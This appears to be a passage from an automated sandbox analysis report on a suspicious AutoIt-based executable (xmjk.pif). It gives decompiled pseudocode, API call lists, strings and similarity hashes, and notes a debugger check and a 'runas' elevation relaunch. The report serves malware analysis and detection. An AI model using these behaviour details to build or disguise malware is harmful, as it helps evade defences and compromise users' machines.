                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: 0
                • API String ID: 2622349952-4108050209
                • Opcode ID: 2023221d83ddf8db8bd20dcb071d0e7e46eeb7c10b76282a51d3a8d566d96a9e
                • Instruction ID: c10187ea43927fa64f0eeb85147c97a7212b27907c3442a655dfe3ea490ae718
                • Opcode Fuzzy Hash: 2023221d83ddf8db8bd20dcb071d0e7e46eeb7c10b76282a51d3a8d566d96a9e
                • Instruction Fuzzy Hash: 74F0C2B054238AABDF251F638C09BED3F59AF1634EF088415FC96918B1C778CA90EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB04BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E00CB04BA(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00CA6CC9(E00CA6CCE(_t6, 0xce00e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xce00e0, 0xce00e0, 2);
				}
				return _t2;
			}






                0x00cb04ba
                0x00cb04c0
                0x00cb04c9
                0x00cb04d2
                0x00000000
                0x00cb04f1
                0x00cb04f2

                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,00CB05D9,?,?,00CB064E,?,?,?,?,?,00CB0638), ref: 00CB04C0
                • GetLastError.KERNEL32(?,?,00CB064E,?,?,?,?,?,00CB0638), ref: 00CB04CC
                  • Part of subcall function 00CA6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6CEC
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CB04D5
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                • Opcode ID: 09e6228ccebe5b8fd6b69ff6225ee109ec2508b487d1c5111d1edbbf654d7b3b
                • Instruction ID: 445fae978b56d1cad7299d828a454ca3787b146fdf6ad06604116507ac656993
                • Opcode Fuzzy Hash: 09e6228ccebe5b8fd6b69ff6225ee109ec2508b487d1c5111d1edbbf654d7b3b
                • Instruction Fuzzy Hash: 0CD05E7150A03267DB0123686D0AFAFBA15DF22338F64871AF639652E6CA200D9196D5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAD6C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CAD6C1(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





                0x00cad6c4
                0x00cad6d4
                0x00cad6dc
                0x00cad6de
                0x00000000
                0x00cad6de
                0x00cad6e3

                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,00CACFBE,?), ref: 00CAD6C6
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CACFBE,?), ref: 00CAD6D4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                • Opcode ID: 178d6328baf371cf28e91022808ac7a3c7cad7c170078cfd6d692f091aa1b0ae
                • Instruction ID: 397bcef60e5980607b6e5fa74abbe072eba0e29f4126d00986b8f6f8592b24e9
                • Opcode Fuzzy Hash: 178d6328baf371cf28e91022808ac7a3c7cad7c170078cfd6d692f091aa1b0ae
                • Instruction Fuzzy Hash: 04C0803134231256D73027307C0DF47AF58BF25B12F15045AF246D91D0DDE5D441C750
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: xmjk.pif PID: 6660 Parent PID: 6308 xmjk.pifCOMMON

                Executed Functions

                Function 003F98F0, Relevance: 40.9, APIs: 21, Strings: 1, Instructions: 2413COMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 003F9911
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • _memmove.LIBCMT ref: 003F995C
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 003F99A3
                • _memmove.LIBCMT ref: 003F9FE6
                • _memmove.LIBCMT ref: 003FA914
                • _memmove.LIBCMT ref: 00419769
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                • String ID: DZG
                • API String ID: 2383988440-540974563
                • Opcode ID: e8bc172c246d3ef7ea22a2d1c4d4cc256bf0a323a2447f591e62d703d8e20420
                • Instruction ID: 606d59d22e27baff8969b225c4b21d7081edcb44714574d8a1f9664696161b08
                • Opcode Fuzzy Hash: e8bc172c246d3ef7ea22a2d1c4d4cc256bf0a323a2447f591e62d703d8e20420
                • Instruction Fuzzy Hash: DE139DB4608204DFC725DF24C480B6BB7E5BF89304F14896EE58A8B751D739EC85CB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043BCB3, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003FF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\31956653\thjfdg.xcp,003FF1F5,C:\Users\user\31956653\thjfdg.xcp,004990E8,C:\Users\user\31956653\thjfdg.xcp,?,003FF1F5,?,?,00000001), ref: 003FF23C
                  • Part of subcall function 004238ED: __wsplitpath.LIBCMT ref: 00423913
                  • Part of subcall function 004238ED: __wsplitpath.LIBCMT ref: 00423935
                  • Part of subcall function 004238ED: __wcsicoll.LIBCMT ref: 00423959
                  • Part of subcall function 0042397D: GetFileAttributesW.KERNELBASE(?), ref: 00423984
                • _wcscat.LIBCMT ref: 0043BD20
                • _wcscat.LIBCMT ref: 0043BD49
                • __wsplitpath.LIBCMT ref: 0043BD76
                • FindFirstFileW.KERNELBASE(?,?), ref: 0043BD8E
                • _wcscpy.LIBCMT ref: 0043BDFD
                • _wcscat.LIBCMT ref: 0043BE0F
                • _wcscat.LIBCMT ref: 0043BE21
                • lstrcmpiW.KERNEL32(?,?), ref: 0043BE4D
                • DeleteFileW.KERNEL32(?), ref: 0043BE5F
                • MoveFileW.KERNEL32(?,?), ref: 0043BE7F
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0043BE96
                • DeleteFileW.KERNEL32(?), ref: 0043BEA1
                • CopyFileW.KERNELBASE(?,?,00000000), ref: 0043BEB8
                • FindClose.KERNEL32(00000000), ref: 0043BEBF
                • MoveFileW.KERNEL32(?,?), ref: 0043BEDB
                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0043BEF0
                • FindClose.KERNEL32(00000000), ref: 0043BF08
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                • String ID: \*.*
                • API String ID: 2188072990-1173974218
                • Opcode ID: c4cdbdea409be23f1c26f4208fa94dffad9e8f990ca354e161e1abfc6b534ec0
                • Instruction ID: 163240f75b358e77946f66d954b4087e32ff12944d2ce604809ac529e4835159
                • Opcode Fuzzy Hash: c4cdbdea409be23f1c26f4208fa94dffad9e8f990ca354e161e1abfc6b534ec0
                • Instruction Fuzzy Hash: F65152B2408384AAC724DBA4DC45FDF73E8EF89315F444A1EF78982151EB79D248C7A6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F35F0, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 003F3681
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003F3697
                • __wsplitpath.LIBCMT ref: 003F36C2
                  • Part of subcall function 0040392E: __wsplitpath_helper.LIBCMT ref: 00403970
                • _wcscpy.LIBCMT ref: 003F36D7
                • _wcscat.LIBCMT ref: 003F36EC
                • SetCurrentDirectoryW.KERNELBASE(?), ref: 003F36FC
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                  • Part of subcall function 003F3D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,003F378C,?,?,?,00000010), ref: 003F3D38
                  • Part of subcall function 003F3D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 003F3D71
                • _wcscpy.LIBCMT ref: 003F37D0
                • _wcslen.LIBCMT ref: 003F3853
                • _wcslen.LIBCMT ref: 003F38AD
                Strings
                • Unterminated string, xrefs: 004182C6
                • _, xrefs: 003F394C
                • Error opening the file, xrefs: 004181AF
                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0041817E
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                • API String ID: 3393021363-188983378
                • Opcode ID: 15310c2ab625d600a1940cd6354b9a26d5adddf7d9102e069c97323c074f384f
                • Instruction ID: 11be5aa0be299bea98a138cce7f032ef485e46d36ac6dbc0abf6f9abb2b5322c
                • Opcode Fuzzy Hash: 15310c2ab625d600a1940cd6354b9a26d5adddf7d9102e069c97323c074f384f
                • Instruction Fuzzy Hash: 32D1F3B2508345AAD712EF64C841AFFB7E8AF85304F00482EF6C557251DBB8DA49C7A3
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FD7A0, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138windowCOMMON
                Download Yara Rule
                APIs
                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 003FD7BA
                  • Part of subcall function 003F2190: __wcsicoll.LIBCMT ref: 003F2262
                  • Part of subcall function 003F2190: __wcsicoll.LIBCMT ref: 003F2278
                  • Part of subcall function 003F2190: __wcsicoll.LIBCMT ref: 003F228E
                  • Part of subcall function 003F2190: __wcsicoll.LIBCMT ref: 003F22A4
                  • Part of subcall function 003F2190: _wcscpy.LIBCMT ref: 003F22C4
                • IsDebuggerPresent.KERNEL32 ref: 003FD7C6
                • GetFullPathNameW.KERNEL32(C:\Users\user\31956653\thjfdg.xcp,00000104,?,00497F50,00497F54), ref: 003FD82D
                  • Part of subcall function 003F16A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003F16E5
                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 003FD8A2
                • MessageBoxA.USER32 ref: 0041E14F
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0041E1A3
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0041E1D3
                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0041E21D
                • ShellExecuteW.SHELL32(00000000), ref: 0041E224
                  • Part of subcall function 004003E0: GetSysColorBrush.USER32(0000000F), ref: 004003EB
                  • Part of subcall function 004003E0: LoadCursorW.USER32(00000000,00007F00), ref: 004003FA
                  • Part of subcall function 004003E0: LoadIconW.USER32 ref: 00400410
                  • Part of subcall function 004003E0: LoadIconW.USER32 ref: 00400423
                  • Part of subcall function 004003E0: LoadIconW.USER32 ref: 00400436
                  • Part of subcall function 004003E0: LoadImageW.USER32 ref: 0040045E
                  • Part of subcall function 004003E0: RegisterClassExW.USER32 ref: 004004AD
                  • Part of subcall function 00400350: CreateWindowExW.USER32 ref: 00400385
                  • Part of subcall function 00400350: CreateWindowExW.USER32 ref: 004003AE
                  • Part of subcall function 00400350: ShowWindow.USER32(?,00000000), ref: 004003C4
                  • Part of subcall function 00400350: ShowWindow.USER32(?,00000000), ref: 004003CE
                  • Part of subcall function 003FE2C0: _memset.LIBCMT ref: 003FE2E2
                  • Part of subcall function 003FE2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003FE3A7
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__memset_wcscpy
                • String ID: AutoIt$C:\Users\user\31956653\thjfdg.xcp$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                • API String ID: 765478012-3455668180
                • Opcode ID: 47e80feaa5504617361ad7790fe7c7e717f84a5a4710bc1d54ddf44491bed532
                • Instruction ID: 0cdfce2b71f1f2f9ed3693d7b06c1704512e1990cd5c4c9cc91527ccd5f57933
                • Opcode Fuzzy Hash: 47e80feaa5504617361ad7790fe7c7e717f84a5a4710bc1d54ddf44491bed532
                • Instruction Fuzzy Hash: 2B410B71608248BBDB12A7E4DD49BF93B789B58710F1040BAFB4967291CBB849C4C72D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FEE30, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNELBASE(uxtheme.dll,003FEE15,003FD92E), ref: 003FEE3B
                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 003FEE4D
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: IsThemeActive$uxtheme.dll
                • API String ID: 2574300362-3542929980
                • Opcode ID: 82eaac2e90c88e2c6a10c675516e9789ba775925eeb2d9fa52740bcc4715997f
                • Instruction ID: c1771601709cb5c2f68b652b14cda58a5b240d15a698fcf932e3d98917388004
                • Opcode Fuzzy Hash: 82eaac2e90c88e2c6a10c675516e9789ba775925eeb2d9fa52740bcc4715997f
                • Instruction Fuzzy Hash: 8CD0C9B4940B07DAE7310F35D90972277E4BB50B51F218829AAA9E1160DBB8C4808A29
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042399B, Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004239AC
                • FindFirstFileW.KERNELBASE(?,?), ref: 004239BD
                • FindClose.KERNEL32(00000000), ref: 004239D0
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileFind$AttributesCloseFirst
                • String ID:
                • API String ID: 48322524-0
                • Opcode ID: df71a782d1bbdc135ea6711509c7469c5900009e0f58bb8ee8b75a6340231c72
                • Instruction ID: 2d2732692b1fcafc73bcf5e046e0962f7c118b2c0380f6eb813805e5131dd533
                • Opcode Fuzzy Hash: df71a782d1bbdc135ea6711509c7469c5900009e0f58bb8ee8b75a6340231c72
                • Instruction Fuzzy Hash: 1FE092729145189B8610AA78BC094EA77ACEF06336F800763FE3CC21D0D7B49AD087DA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F3C50, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                Download Yara Rule
                C-Code - Quality: 57%
                			E003F3C50(char* __ecx, void* __edx, void* __fp0, char _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8196;
				void* __ebx;
				void* __edi;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				signed int _t65;
				void* _t67;
				intOrPtr _t68;
				signed int _t72;
				intOrPtr _t76;
				signed int _t86;
				char* _t96;
				intOrPtr _t101;
				void* _t116;
				intOrPtr* _t117;
				void* _t119;
				short* _t120;
				signed int _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t134 = __fp0;
				_t98 = __ecx;
				E00412160(0x2004);
				_t120 = _a4;
				if( *_t120 == 0x23) {
					_t96 = __ecx;
					_t44 = E0040333F(_t120, L"#notrayicon", 0xb);
					_t124 = _t123 + 0xc;
					__eflags = _t44;
					if(_t44 != 0) {
						_t45 = E0040333F(_t120, L"#requireadmin", 0xd);
						_t125 = _t124 + 0xc;
						__eflags = _t45;
						if(_t45 != 0) {
							_t46 = E0040333F(_t120, L"#NoAutoIt3Execute", 0xd);
							_t126 = _t125 + 0xc;
							__eflags = _t46;
							if(_t46 != 0) {
								_t47 = E0040333F(_t120, L"#OnAutoItStartRegister", 0x16);
								_t127 = _t126 + 0xc;
								__eflags = _t47;
								if(__eflags != 0) {
									_t48 = E0040333F(_t120, L"#include-once", 0xd);
									_t128 = _t127 + 0xc;
									__eflags = _t48;
									if(_t48 != 0) {
										_t49 = E0040333F(_t120, L"#include", 8);
										_t129 = _t128 + 0xc;
										__eflags = _t49;
										if(_t49 != 0) {
											_t50 = E0040333F(_t120, L"#comments-start", 0xf);
											_t130 = _t129 + 0xc;
											__eflags = _t50;
											if(__eflags == 0) {
												L28:
												_t117 = _a12;
												_a4 = 1;
												while(1) {
													_t51 = E0045FD26(__eflags, _a16, _t120); // executed
													__eflags = _t51;
													if(__eflags == 0) {
														break;
													}
													 *_t117 =  *_t117 + 1;
													E00434AA0(_t98, __eflags, _t120);
													E00434A44(_t98, _t120);
													_t58 = E0040333F(_t120, L"#comments-start", 0xf);
													_t130 = _t130 + 0xc;
													__eflags = _t58;
													if(__eflags == 0) {
														L36:
														_a4 = _a4 + 1;
														continue;
													}
													_t59 = E0040333F(_t120, L"#cs", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t59;
													if(__eflags == 0) {
														goto L36;
													}
													_t60 = E0040333F(_t120, L"#comments-end", 0xd);
													_t130 = _t130 + 0xc;
													__eflags = _t60;
													if(_t60 == 0) {
														L34:
														_t62 = _a4 - 1;
														_a4 = _t62;
														__eflags = _t62;
														if(__eflags > 0) {
															continue;
														}
														return 1;
													}
													_t64 = E0040333F(_t120, L"#ce", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t64;
													if(__eflags != 0) {
														continue;
													}
													goto L34;
												}
												__eflags = _a4;
												if(__eflags <= 0) {
													L5:
													return 1;
												}
												E00443F89(__eflags, _t134, _t96, _a8,  *_t117, L"Unterminated group of comments", _t120);
												return 0;
											}
											_t65 = E0040333F(_t120, L"#cs", 3);
											_t130 = _t130 + 0xc;
											__eflags = _t65;
											if(__eflags != 0) {
												goto L5;
											}
											goto L28;
										}
										_push( &_v8196);
										_push(_t120 + 0x10);
										_push(_t96);
										_t67 = E00434AE1();
										_t101 = _a8;
										__eflags = _t67 - 1;
										_t68 =  *_a12;
										if(__eflags != 0) {
											E00443F89(__eflags, __fp0, _t96, _t101, _t68, L"Cannot parse #include", _t120);
											return 0;
										}
										_push(_t68);
										_push(_t120);
										_push(_t101);
										_push(E003FF290(_t96,  &_v8196, _t116));
										_push( &_v8196);
										_push(_t96);
										_t72 = E003F35F0( &_v8196, __fp0);
										__eflags = _t72;
										return 0 | _t72 != 0x00000000;
									}
									__eflags =  *((intOrPtr*)(_t96 + 0x20)) - _t48;
									if( *((intOrPtr*)(_t96 + 0x20)) <= _t48) {
										goto L5;
									}
									_t121 = 0;
									__eflags = 0;
									while(1) {
										_t76 = E004013CB(_t116,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1c)) + _t121 * 4)))), _a8);
										_t128 = _t128 + 8;
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										_t121 = _t121 + 1;
										__eflags = _t121 -  *((intOrPtr*)(_t96 + 0x20));
										if(_t121 <  *((intOrPtr*)(_t96 + 0x20))) {
											continue;
										}
										return 1;
									}
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 1;
									return ((0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 0x00000001 <= 0x00000000) - 0x00000001 & 0x00000003) + 1;
								}
								_t122 = E003FF260(_t120 + 0x2c, __eflags);
								E00434A44(_t98, _t122);
								E00434AA0(_t98, __eflags, _t122);
								_t86 = E004010E1(_t122);
								__eflags =  *((short*)(_t122 + _t86 * 2 - 2)) - 0x22;
								if( *((short*)(_t122 + _t86 * 2 - 2)) != 0x22) {
									_push(_t122);
								} else {
									_t8 = _t122 + 2; // 0x2
									_t119 = _t8;
									 *((short*)(_t122 + _t86 * 2 - 2)) = 0;
									E00434A44(0, _t119);
									E00434AA0(0, __eflags, _t119);
									_push(_t119);
								}
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 4)))) + 8))))();
								_push(_t122);
								E004010FC();
								return 1;
							}
							 *((char*)(_t96 + 2)) = 1;
							return 1;
						}
						 *((char*)(_t96 + 1)) = 1;
						return 1;
					}
					 *_t96 = 1;
					goto L5;
				}
				return 3;
			}









































                0x003f3c50
                0x003f3c50
                0x003f3c58
                0x003f3c5f
                0x003f3c67
                0x00418390
                0x00418392
                0x00418397
                0x0041839a
                0x0041839c
                0x004183b3
                0x004183b8
                0x004183bb
                0x004183bd
                0x004183d5
                0x004183da
                0x004183dd
                0x004183df
                0x004183f7
                0x004183fc
                0x004183ff
                0x00418401
                0x0041846b
                0x00418470
                0x00418473
                0x00418475
                0x004184cb
                0x004184d0
                0x004184d3
                0x004184d5
                0x0041853b
                0x00418540
                0x00418543
                0x00418545
                0x0041855f
                0x0041855f
                0x00418562
                0x00418569
                0x0041856e
                0x00418573
                0x00418575
                0x00000000
                0x00000000
                0x00418577
                0x0041857a
                0x00418580
                0x0041858d
                0x00418592
                0x00418595
                0x00418597
                0x004185ea
                0x004185ea
                0x00000000
                0x004185ea
                0x004185a1
                0x004185a6
                0x004185a9
                0x004185ab
                0x00000000
                0x00000000
                0x004185b5
                0x004185ba
                0x004185bd
                0x004185bf
                0x004185d5
                0x004185d8
                0x004185d9
                0x004185dc
                0x004185de
                0x00000000
                0x00000000
                0x00000000
                0x004185e0
                0x004185c9
                0x004185ce
                0x004185d1
                0x004185d3
                0x00000000
                0x00000000
                0x00000000
                0x004185d3
                0x004185f2
                0x004185f6
                0x004183a1
                0x00000000
                0x004183a1
                0x0041860a
                0x00000000
                0x0041860f
                0x0041854f
                0x00418554
                0x00418557
                0x00418559
                0x00000000
                0x00000000
                0x00000000
                0x00418559
                0x004184dd
                0x004184e1
                0x004184e2
                0x004184e3
                0x004184eb
                0x004184ee
                0x004184f0
                0x004184f2
                0x00418527
                0x00000000
                0x0041852c
                0x004184f4
                0x004184f5
                0x004184f6
                0x00418502
                0x00418509
                0x0041850a
                0x0041850b
                0x00418512
                0x00000000
                0x00418517
                0x00418477
                0x0041847a
                0x00000000
                0x00000000
                0x00418480
                0x00418480
                0x00418482
                0x0041848f
                0x00418494
                0x00418497
                0x00418499
                0x00000000
                0x00000000
                0x0041849b
                0x0041849c
                0x0041849f
                0x00000000
                0x00000000
                0x00000000
                0x004184a1
                0x004184b3
                0x00000000
                0x004184bd
                0x0041840b
                0x0041840e
                0x00418414
                0x0041841a
                0x00418422
                0x00418428
                0x00418443
                0x0041842a
                0x0041842c
                0x0041842c
                0x00418430
                0x00418435
                0x0041843b
                0x00418440
                0x00418440
                0x0041844e
                0x00418450
                0x00418451
                0x00000000
                0x00418459
                0x004183e1
                0x00000000
                0x004183e5
                0x004183bf
                0x00000000
                0x004183c3
                0x0041839e
                0x00000000
                0x0041839e
                0x00000000

                APIs
                Strings
                Memory Dump Source
